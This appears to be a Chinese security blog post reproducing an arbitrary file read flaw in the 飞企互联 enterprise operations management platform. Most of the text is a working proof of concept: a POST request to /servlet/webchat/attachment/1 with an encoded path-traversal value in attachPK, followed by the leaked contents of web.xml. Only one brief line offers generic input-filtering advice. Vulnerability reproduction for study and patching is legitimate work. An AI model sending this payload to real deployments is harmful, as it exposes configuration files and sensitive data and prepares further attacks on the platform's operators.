导读
主要分享学习日常中的web渗透,内网渗透、漏洞复现、工具开发相关等。希望以技术共享、交流等不断赋能自己,为网络安全发展贡献自己的微薄之力!


飞企互联企业运营管理平台存在任意文件读取漏洞隐患,攻击者可通过此漏洞获取敏感信息,为下一步攻击做准备。

1、本地搭建,访问界面如下
2、漏洞复现,隐患url如下
/servlet/webchat/attachment/1
3、利用POC读取web.xml
POST /servlet/webchat/attachment/1 HTTP/1.1
attachPK=%2Fv8AMQAJAC8ACQAvAAkALwAJAC8ALgAuAC8ALgAuAC8ALgAuAC8AagBiAG8AcwBzAC8AdwBlAGIALwBmAGUALgB3AGEAcgAvAFcARQBCAC0ASQBOAEYALwB3AGUAYgAuAHgAbQBs&mailAttachment=1
4、部分内容如下
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd"
version="3.1">
<context-param>
<param-name>contextConfigLocation</param-name>
<param-value>/WEB-INF/classes/spring/*-bean.xml</param-value>
</context-param>
<context-param>
<param-name>log4jConfigLocation</param-name>
<param-value>WEB-INF/classes/log4j.properties</param-value>
</context-param>
<context-param>
<param-name>log4jRefreshInterval</param-name>
<param-value>60000</param-value>
</context-param>
<context-param>
<param-name>embedhttpserver</param-name>
<param-value>false</param-value>
</context-param>
<context-param>
<param-name>embedhttpserverPort</param-name>
<param-value>6629</param-value>
</context-param>
....

1、对用户输入进行严格的过滤和校验,避免出现任意文件读取漏洞

原文始发于微信公众号(非攻安全实验室):飞企互联企业运营管理平台存在任意文件读取